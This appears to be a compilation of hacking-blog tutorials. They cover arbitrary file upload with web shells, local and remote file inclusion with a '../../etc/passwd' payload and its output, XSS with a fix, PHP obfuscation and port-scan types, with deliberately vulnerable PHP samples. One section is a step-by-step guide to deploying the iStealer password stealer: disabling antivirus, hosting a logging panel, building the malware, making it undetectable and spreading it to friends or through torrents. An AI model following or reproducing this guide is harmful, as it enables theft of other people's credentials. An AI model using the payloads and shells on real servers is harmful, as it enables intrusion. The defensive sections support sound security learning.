Basics of Arbitary File Upload

As the name suggests Arbitrary File Upload Vulnerabilities is a type of vulnerability which occurs in web applications if the file type uploaded is not checked, filtered or sanitized.

The main danger of these kind of vulnerabilities is that the attacker can upload a malicious PHP , ASP etc. script and execute it. The main idea is to get the access to the server and execute desired code. for example an Attacker who have gained access to such kind of vulnerability can upload a malicious shell script and further can control the machine to execute desired commands, which would lead to a full compromise of the server and the victim’s server gets owned.

In this tutorial we’ll be looking at a a basic example of a Vulnerable Script and How to exploit it. So let’s get started.

Proof of Concept

For the demonstration of a realistic scenario, I have created a basic vulnerable PHP script.

Upload.php

Code:

<?php
   
  /**
   * @author lionaneesh
   * @copyright 2011
   * @page upload.php
   */
   
  // If the upload request has been made , Upload the file
   
  $uploadMessage = "";
   
  if (isset($_POST['upload']))
  {
        $path = $_FILES['uploadFile']['name'];
        if(move_uploaded_file($_FILES['uploadFile']['tmp_name'],$path) == TRUE)
        {
              $uploadMessage = "File Uploaded <a href='$path'>HERE</a>";
        }
  }
   
  ?>
   
  <html>
   
  <head>
   
      <title>Welcome to Vulnerable Apps</title>
   
  </head>
   
  <body>
   
  <h1>Arbitary file upload ( POC )</h1>
  <hr />
   
  <p>Hey all this is a sample php script to upload image files , This script doesn't contains file type checking code which makes it prone to Arbitary file upload vulnerbility. </p>
   
  <hr />
  <h2>Upload</h2>
  <hr />
   
  <table>
  <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" enctype="multipart/form-data">
      <tr>
      
          <td width="100">Upload File </td>
          <td width="380"><input class="cmd" type="file" name="uploadFile"/></td>
          <td><input style="margin-left:20px;" type="submit" name="upload" class="own" value="Upload"/></td>
      
      </tr>
  </form>
  </table>
  <?php
   
  echo $uploadMessage;
   
  ?>
   
  </body>
   
  </html>

In the above script we simply ask the user to input the file to be uploaded and without even checking what the file-type is or its extension we upload it.

This is a basic example of how these bugs occur.

How to exploit it

Now to exploit this common bug is yet simpler, the hacker can simply download any Web Shell-Scripts , Written in PHP , ASP etc.

Some PHP Shells :-

Ani-Shell
[ R57 Shell
C99 Shell

Note: These shells are not intended to be used as this way, author is not responsible for the way in which the user uses it.

Now to exploit this vulnerability the hacker have to carry out some steps :-

Upload the Shell

Go to the link

Gain Access

That's it for this tutorial stay tuned for more.

Tell the World ...

Read More

Basics of LFI and RFI Attacks

Local File Inclusion ( LFI ) is a method of including files on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like , include() , require() etc.) . Mostly these attacks are accompanied by Directory Transversal attacks which can reveal some sensitive data leading to further attacks.

Now that’s quite a bit of theory there let’s have a look on a sample vulnerable application.

Demonstration [Proof of Concept]

I have created a pair of files named index.html and lfi.php
lfi.php

Code:

<html>
   <head>
   <title>Vulnerable to LFI -- by lionaneesh</title>
  </head>   
  <body>
   
   <h1>Welcome to this Website</h1>
   
  <?php $page = isset($_GET['page']) ? $_GET['page'] : 'index.html'; ?>
   
   <p>You are currently at <?php echo"<a href='$page'>$page</a>";?></p>
   
   <?php include($page); ?>
   </body>
  </html>

As you see the above code has a include(USER_INPUT) So basically we can input any filename and it will simply print out the contents on the screen. This is the most popular form in which these bugs occur.
index.html

Code:

<p>Hello I am a sample page my name is index.html</p>

Providing normal Input:-
First let’s try and give this app a normal input which it would be expecting.

Input: index.html
Output:-

Code:

Welcome to this Website

  You are currently at index.html
  Hello I am a sample page my name is index.html

It works fine! Now let’s construct the attack string and see what happens!


Constructing the attack string

As I am working on UNIX we’ll print out the contents of /etc/passwd file , The file /etc/passwd is a local source of information about users' accounts.

My present working directory is /var/www/ , So what I have to do is :-

1. Go back 2 directories and
2. Then go to /etc/passwd

We can go back 2 directories using ‘../../’

Attack string :-

Code:

../../etc/passwd

Now lets feed this as an input and see what happens.

Input: “ ../../etc/passwd”

Code:

Welcome to this Website

  You are currently at ../../etc/passwd 
  root:x:0:1:Super-User:/root:/sbin/sh 
daemon:x:1:1::/: 
bin:x:2:2::/usr/bin: 
sys:x:3:3::/: 
adm:x:4:4:Admin:/var/adm: 
lp:x:71:8:Line Printer Admin:/usr/spool/lp: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/

And voila! We just printed the /etc/passwd file.

Remote File Inclusion

RFI is an abbreviation for Remove File Inclusion and is quite similar to LFI, Remote File Inclusion ( RFI ) is a method of including Remote files(present on another server) on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like, include (), require () etc.)

Demonstration [Proof of Concept]

We’ll be using the same sample web-app we used to Demonstrate LFI

Constructing the attack string:-

In our case we want to include go4expert’s index file in our local file.

So what we have to do is, simply provide the URI as an input and see what happens

Input : http://go4expert.com

Output (page source):-

Code:

<html>
<head>
                       <title>Vulnerable to LFI -- by lionaneesh</title>
 </head>

 <body>

 <h1>Welcome to this Website</h1>

  <p>You are currently at <a href='http://go4expert.com'>http://go4expert.com</a>

</p> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>         <meta http-equiv="Cache-Control" content="no-cache" />        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />  
<title>Programming and SEO Forums </title> 

<!-- ChartBeat -->

<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>

<!-- /ChartBeat --> 

 --------Sniped-----------

Note: In most modern ‘php.ini’ files, allow_url_include is set to off which would not allow a malicious user to include a remote file.

Read More

Basics of XSS, How the Logic Works

---

Cross Site Scripting also known as XSS is a popular type of Client Site Attack, It is a type of attack which occurs in Web-Applications and allows an attacker to inject desired client-side scripts into Web-Pages viewed by others.

Types of XSS

This attack is mainly of 2 types

Non-Persistent

This type of attack is carried out by injecting some client side code in a Vulnerable URL. Now further the Attacker can spread this URL and send it to his/her victims by means of some social engineering etc , on clicking these links the Victims Unknowingly executes the injected code , Which in turn can result in Cookie stealing , Privacy Disclosure etc.

Persistent

This type of Attack is more dangerous and it occurs when the data provided by the attacker is stored by the server, which is viewed as a normal page to the normal users.
Now Further the Attacker can simply inject some malicious Client Side Code which in turn can result in Defacement of the Website, Cookie Stealing, and Privacy Disclosure etc.

Demo

Now that we know something about what are these type of vulnerabilities and how they occur let’s actually take a look at how these vulnerabilities occur How to test it!
Xss.php

Code: php

<html>
<head>
    <title>Vulnerable to XSS</title>
</head>
</html>
<body>
<h1>Welcome to XSS Demo Page</h1>

<p>The Data Entered is As Follows :- </p>

<?php

/**
 * @author lionaneesh
 * @copyright 2011
 */
 

if(isset($_GET['data']))
{
    $data = $_GET['data'];
}
else
{
    $data = "No Data Entered !";
}

echo "<i>$data</i>";

?>

</body>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Wow! An Alert box saying XSS will appear proving that your injected code actually executed! Now this is just an example of how these vulnerabilities can occur in web-applications and how you can test them!

How to Fix Them

If you’re one of the people whose site is vulnerable to this type of attack I recommend fixing it as soon as possible, For the scope of this tutorial I’ll be only covering on how these vulnerabilities can be fixed in PHP , If you are using some other language , I recommend you to check your Language Reference or Contact Me .

PHP Provides a function called htmlspecialchars() which converts the chars into their HTML entities. Now we’ll just use this in the above code and check what happens.
Xss.php (line number 33)

Code: php

echo htmlspecialchars("<i>$data</i>");

Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Voila! U can notice the change now!

That’s all for this tutorial stay tuned for more

For advanced reading click here

Thanks,

Greyhat

Read More

Obfuscating PHP

I must say that hiding or obfuscating is not the most effective ways of security but it’s still effective to keep a Script Kiddy confused about what actually you are using in your server.

As an example - Server may use vulnerable version of PHP, with a public exploit released at some underground markets, Most of the time a simple automated exploit is released to help the “Point-Click-Hackers” (Script Kiddies). Now all they have to find is which Version of PHP you are using and if it is vulnerable, Point the exploit, launch it and own your system. In these cases obfuscating can really help you a lot.

By PHP obfuscation you can hide PHP, Which means you can stop or slow down a hacker attacking your machine.

In this tutorial, we’ll be looking at some of the most popular methods used by Site Administrators to Hide PHP , So let’s get started.

Editing php.ini file

PHP as a default exposes the fact that if it is installed on a server or not, by adding its signature to the Web server header which can really be lethal in some cases.

To set this off , Simply go to your php installation directory under “conf_files” , you can find your standard PHP Configuration file named “php.ini”

Now under this file , go to the “Miscellaneous” section and simply turn expose_php to Off.

Spoofing

By adding a simple line of code you can actually fool an attacker about what service are you using.

Spoof.php

Code: php

<?php
error_reporting(0);
header("X-Powered-By: My Programming Language");
?>

Note: The header call should be made before you send any data to the client.

Using Some Basic Apache Rules

Most Web servers like Apache etc. Can be configured to use some basic rules that would allow to parse different file-types with PHP.

EG:-

A file like index.php, gives a straight clue to the attacker that the server is using php. But if we can use some basic server configuration to actually allow a extension like “.mpl” etc to parse PHP code. The attacker will certainly have no clue about the file extension.

For the Scope of this tutorial I’ll only be covering some Apache Rules/Configurations, but if you need help with some other servers, feel free to comment or PM me.

The configurations can be added either using the .htaccess directive or directly through the Apache Configurations file. Just add the following set of rules

Syntax :-

Code:

AddType application/x-httpd-php .extenstion

Example :-

Code:

AddType application/x-httpd-php .mpl .mp3 .py .asp

Note : Only use those extensions which are normally not used by the server , for example don’t use .txt extension as the server will interpret .txt as PHP code and if it contains some php , it will be executed.

Conclusion

Obfuscation is not the most effective way of security and at most of the times, it doesn’t help, as a professional hacker would already know these modifications and can easily make out what you are trying to hide. But obfuscation would really slow down the attacker and will keep away some script kiddies. It is better to obfuscate than rather telling him what he wants.

Read More

The GREAT FIRE"WALL" Of China

Read More

Hack Passwords Using iStealer

There are diffirent way's to steal passwords.
I want to be able to steal passwords from cookie files with 1 click,

well what do you know it exists! It's a cookie stealer called iStealer ( 6.0 is newest version ).
It steals every cookie password from the slave's browser, and shows it to the attacker.
So if you do it correctly you will have hotmail, netlog, facebook, WoW, rapidshare and other passwords from lots of people in no time.

I'll set one up, and will go thru all the details.

Prepare yourself

1st Download iStealer 6.0 ( link is at the bottom of the thread )

2th Disable your virusscanner, this is because your antivirus sees the iStealer program as a keylogger ( it's acctualy a CookieStealer but whatever )

3th Register domain and hosting
iStealer requires a webserver, this is because when someone click's your own made "Virus" it has to send the passwords and usernames somewhere.
I suggest http://www.000webhost.com/ for free webhosting, so register a domain there.

The registration can take a while, but when u have your domain registered, go to the cPanel.
Once your on the cPanel, click on MySQL ( this is under the tab "Software / Services" )

Now create a new database and user. Something like this

MySQL database name: a7356028_stealer
MySQL user name: a7356028_theadmin
Password for MySQL user: 123456
Then click create database.

Configure to steal

Now extract the downloaded zip file ( below the thread ).
You should have iStealer 6.0.exe, and a map called PHP Logger.
Open index.php in the map PHP Logger with notepad or any text-editor.

you see a bunch of codes, but dont worry, we only need the first part of the php file. Search for the CONFIGURATION section, this will be in it

$dbHost = "localhost"; // MySQL host
$dbUser = "suicide_admin"; // MySQL username
$dbPass = "GOX"; // MySQL password
$dbDatabase = "suicide_is"; // MySQL database name

$username = "admin"; // Login Username
$password = "GOV"; // Login Password
$logspage = 100; // Number of logs per page

Configure this with you own MySQL database information. Then it should look like this

$dbHost = "localhost"; // MySQL host
$dbUser = "a7356028_theadmin"; // MySQL username
$dbPass = "123456"; // MySQL password
$dbDatabase = "a7356028_stealer"; // MySQL database name

$username = "admin"; // Login Username
$password = "whatuwant"; // Login Password
$logspage = 100; // Number of logs per page

Note that the $username and $password variable will be used to log in your website, so choose it carefully.

Now save the file.

Loading it up
Go back to the cPanel of your site, and click on File Manager ( under the tab "Files )
Log in with your 000webhost password and continue.
Click on public_html map, and once ur in it, click Upload.
Select the index.php you saved before, and the style.css

Upload it.

Then just browse to your domain name in your browser, and login with the $username and $password you choose in the index.php ( in my case admin and whatuwant ). Now you have the page where the passwords and usernames are stored.

Making the Stealer File!

Now everything is set up, we have to make our CookieStealer file.
Just open iStealer 6.0.exe, enter your domain on the top ( edit things you want, like changing the icon etc ).

Click build!

Testing, crypting, spreading?

Testing?

To see if it works, just click it yourself! If you enter your website, and see your passwords and usernames, it works!


Crypting?

Well, it worked on yourself, because your antivirus is not up, but most of the people have antivirusscanner on all the time, so you might think of crypting it ( making it undetectable ), i'll talk about this later ( and show u some tools ), in the main time, use Google!

Spreading?

Just make a torrent file with your File in it ( With a combine tool - Google it ).
Or just go to the computer of your friends, shut down their antivirus ( if your file isn't crypted ), and click the file.

Dont spread, it's illegal.






If the link broken , Google for iStealer 6.0 (Files tube Or Mediafire)

Read More

Types Of Port Scanning , Reference

Port numbers are 16-bit unsigned numbers and can be broadly classified into three categories.

Port 0-1023 is "well known ports",
1024 - 49151 are "registered ports"
and 49152 - 65535 is "dynamic or private ports".

One problem with port scanning is that it is effortlessly logged by the services listening at the scanned ports. This is because they detect an incoming connection, but do not receive any data, thereby generating an application error log.

To scan UDP ports, an empty UDP datagram is sent to the port. If the port is listening, the services will send back an error message or ignore the incoming datagram. If the port is closed, the operating system send back "ICMP Port Unreachable" (Type 3) message.

(Remember Windows Uses ICMP To find the Host is alive Or Dead , Linux Uses UDP packets to do the same)


Port scanning can be broadly classified into:

• Open scan
• Half-open scan
• Stealth scan
• Sweeps
• Misc

If ur a Beginner u may be wondering What ype of scan can i go for ??It Completely  depends on the information gathering during reconnaissance regarding the type of network topology, IDS and other logging feature present on the system.

So to be in the Safer Side i have got some links which tells u the logic Behind Each type of Scan , Click Here to Know the Packet Informations

Open Scan

Open scan / TCP connect scan also known as vanilla scan where a full connection is opened to the target system by a three-way TCP/IP handshake. Therefore, it is easiest to be detected and blocked on the network. However the information gathering using open scan is usually the most.
When the port is open, the client sends a SYN flag, the server replies a SYN+ACK flag, which is acknowledged back with an ACK flag by client. Once the handshaking is completed, the connection is terminated by the client. This confirm an open port.
When the port is closed or "not listening" the server response a RST+ACK flag, which is acknowledged back with an RST flag by client, and then the connection is closed.
The disadvantage of this scan technique is that the attacker cannot spoof his identity as spoofing would require sending a correct sequence number as well as setting the appropriate return flags to setup data connection. Moreover, most stately IDS and firewall detect and log this scan, exposing both the attempt and the attacker's IP. The advantage is fast accurate scan that require no additional privilege.

Half-Open Scan

In half-open scan, a complete TCP connection is not established. Instead as soon as the server acknowledge with a SYN+ACK response, the client tears down the connection by sending RST flag. This way, the attacker detect an open port and not establish full connection.


However, some sophisticated IDS and firewall can detect a SYN packet from the void and prevent such scan. Besides, this scan require attacker to make a customer IP packet which in turn requires access to SOCK_RAW (getprotbyname('raw') under most system) or /dev/bpf (Berkeley packet filter), /dev/nit (Sun network interface tap). This requires priviliege access.


Stealth Scan


Initially half open scans were considered stealth, however as IDS software evolved, these scan were easily logged. Now, stealth scan refers to the type of scan where packets are flagged with a particular set of flags other than SYN, or a combination of flags, no flag set, with all flag set, appearing as normal traffic, using fragmented packet or avoiding filtering devices by any other means. All these techniques resort to inverse mapping to determine open ports.

• SYN|ACK Scan
  Client sends a SYN+ACK flag to the target. For a closed port, server will reply a RST response while an open port will not reply. This is because the TCP protocol requires a SYN flag to initiate the connection. This scan may generate certain amount of false positives. For instance, packets dropped by filtering devices, network traffic, timeouts etc can give a wrong inference of an open port while the port may or may not be open. However this is a fast scan that avoid three-way handshake.
• FIN Scan
  Similar to SNY|ACK scan, instead a FIN flag is sent to the target. The closed ports are required to reply to the probe packet with RST, while open ports must ignore the packet in question. This scan attempt to exploit vulnerabilities in BSD code. Since most OS are based on BSD or derived from BSD, this was a scan that can return good result. However, most OS applied patches to correct the problem, still there remains a possibility that the attacker may come across one where these patches have not be applied.
• ACK Scan
  The scan take advantage of the IP routing function to deduce the state of the port from the TTL value. This is based on the fact that IP function is a routing function. Therefore TTL value will be decremented by on by an interface when the IP packet passes through it.
• NULL Scan
  In NULL scan, the packet is sent without any flag set. This takes advantage of RFC 793 as the RFC does not specify how the system should respond. Most UNIX and UNIX related system respond with a RST (if the port is open) to close the connection. However, Microsoft's implementation does not abide with this standard and reacts differently to such scan. An attacker can use this to differentiate between a Windows machine and others by collaborating with other scan results. For example, if -sF, -sX or -sN scan shows all ports are closed, but a SYN (-sS) scan shows ports are opened, the attacker can infer that he is scanning a windows machine. This is not an exclusive property though, as this behavior is also shown by Cisco, BSDI, HP/UX, MVS and IRIX. Also note that the reserved bits (RES1, RES2) do not affect the result of any scan. Therefore this scan will work only with UNIX and related systems.
• Xmas Scan
  In Xmas scan, all flags are set. All the available flags in the TCP header are set (ACK, FIN, RST, SYN, URG, PSH) to give the scan an ornamental look. This scan will work on UNIX and related systems and cause the kernel to drop the packet if the receiving port is open.
• TCP Fragmenting
  This approach is evolved from the need to avoid false positive arising from other scans due to packet filtering device. For any transmission, a minimally allowable fragmented TCP header must contain a destination and source port for the first packet (8 octet, 64 bit), the initialized flags in the next, which allows the remote host to reassemble the packet upon receipt through an internet protocol module that identifies the fragmented packets by the field equivalent values of source, destination, protocol and identification.
  The scan works by splitting the TCP header into small fragments and transmitting it over the network. However, there is a possibility that IP reassembly on the server-side may result in unpredictable and abnormal results - such as fragmentation of the data in the IP header. Some hosts may be incapable of parsing and reassembling the fragmented packets and thus may cause crashes, reboots or even network device monitoring dumps.
  Some firewalls may have rulesets that block IP fragmentation queues in the kernel (like the CONFIG_IP_ALWAYS_DEFRAG option in the Linux kernel) - though this is not widely implemented due to the adverse affect on performance. Since several intrusion detection systems use signature-based mechanisms to signify scanning attempts based on IP and/or the TCP header, fragmentation is often able to evade this type of packet filtering and detection. There is a high possibility of causing network problems on the target network.

Miscellaneous

• FTP bounce
  This scan takes advantage of the FTP servers with read/write access. The advantage of this scan can be both anonymity and accessibility. Suppose the target network allows FTP data transfer from only its recognized partners. An attacker might discover a service business partner who has a FTP service running with a world-writable directory that any anonymous user can drop files into and read them back from. It could even be the ISP hosting services on its FTP server. The attacker, who has a FTP server and able to run in passive mode, logs in anonymously to the legitimate server and issues instructions for scanning or accessing the target server through a series of FTP commands. He may choose to make this into a batch file and execute it from the legitimate server to avoid detection.
  If a connection is established as a means of active data transfer processing (DTP), the client knows a port is open, with a 150 and 226 response issued by the server. If the transfer fails a 425 error will be generated with a refused build data message. The PASV listener connection can be opened on any machine that grants a file write access to the attacker and used to bounce the scan attack for anonymity. It does not even have to be an FTP server, any utility that will listen on a known TCP port and read raw data from it into a file will do.
  Often these scan are executed as batch files padded with junk so that the TCP windows are full and the connection stay alive long enough for the attacker to execute this commands. Fingerprinting the OS scan help determine the TCP window size and allow the attacker to pad this commands for further access accordingly.
  This scan is hard to trace, permits access to local network and evades firewalls. However, most FTP servers have patched this vulnerability by adopting countermeasures such as preventing third party connection and disallowing listing of restricted ports. Another measure adopted has been restrict write access.
• UDP scan
  The disadvantage to the attacker is that UDP is a connectionless protocol and unlike TCP does not retransmit packet if they are lost or dropped on the network. Moreover, it is easily detected and unreliable (false positive). Linux kernel limit ICMP error message rates with destination unreachable set to 80 per 4 seconds, thereafter implmenting a 1/4 second penalty if the count is exceeded. This makes the scan slow and moreover the scan requires root access. However it avoids TCP based IDS and can scan non-TCP ports.

Ethical Hacker and Scanning Tools
The most important is knowledge itself. The result of a scanner can be misleading if the ethical hacker does not have good knowledge of common vulnerabilities. Relying solely on the scanning tool to all threats is not practical as the author of the vulnerability check may have written it incorrectly. It is also likely that it was created in a controlled environment and might not work as well in the open.
Besides, performing exhaustive scan against the system in a large enterprise is usually not feasible due to network constraints, stability of the backbone and scanned systems. Another view point is that scanner does not have an internal view of the host audited and can miss critical misconfiguration that result in an insecure setup, but appear "secure" from the outside with automation

Read More